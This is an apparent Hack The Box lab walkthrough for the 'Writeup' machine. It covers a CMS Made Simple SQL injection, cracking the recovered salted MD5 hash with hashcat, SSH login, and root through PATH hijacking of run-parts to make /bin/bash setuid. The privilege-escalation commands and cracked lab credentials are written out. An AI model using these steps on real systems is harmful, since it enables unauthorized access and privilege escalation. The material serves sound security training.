Writeup HTB Walkthrough

This post documents my process for solving the Writeup box on Hack The Box. The machine revolves around web enumeration, CMS exploitation, SQLi, hash cracking, and privilege escalation via PATH hijacking.

Recon

Target: 10.10.10.138

nmap -sC -sV 10.10.10.138

Results:

• 22/tcp (SSH) OpenSSH 9.2p1 Debian
• 80/tcp (HTTP) Apache httpd 2.4.25 (Debian)
• robots.txt has a disallowed entry: /writeup/
• Site uses CMS Made Simple, version 2.2.9.1

CMS Exploitation

Accessed /writeup and /writeup/doc/CHANGELOG.txt to confirm CMS version.

Searched for vulnerabilities for CMS Made Simple < 2.2.10 — found an SQLi exploit.

Ran the exploit script, retrieved:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Hash Cracking

Discovered that the hash is md5(salt + password) (mode 20 in hashcat). Format for hashcat:
hash:salt

Created a text file and ran:

hashcat -m 20 hashcat.txt /usr/share/wordlists/rockyou.txt

Output:

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

SSH Access

Login with SSH:

• User: jkr
• Pass: raykayjay9

Obtained user flag.

Privilege Escalation (PATH Hijacking)

id output for user jkr:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Being in the staff group allows writing to /usr/local/bin.

Ran pspy and observed root running:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

Exploited PATH hijacking:

echo -e '#!/bin/bash

chmod u+s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

After logging out and back in, saw:

CMD: UID=0 ... | chmod u+s /bin/bash

Now /bin/bash is setuid root. Spawn a root shell with:

/bin/bash -p
whoami
# root

Lessons Learned

• Enumeration of service versions and configuration is critical.
• Check for SQLi in known vulnerable CMS installations and crack hashes carefully—understand hash and salt formats.
• Privilege escalation can be achieved by abusing PATH and writable directories.
• Tools like pspy are invaluable for observing system-level scheduled jobs and root actions.
• Membership in groups like staff can grant unexpected privileges (e.g., writing to /usr/local/bin).

Writeup based on my own exploitation process, with inspiration from official writeups and community references.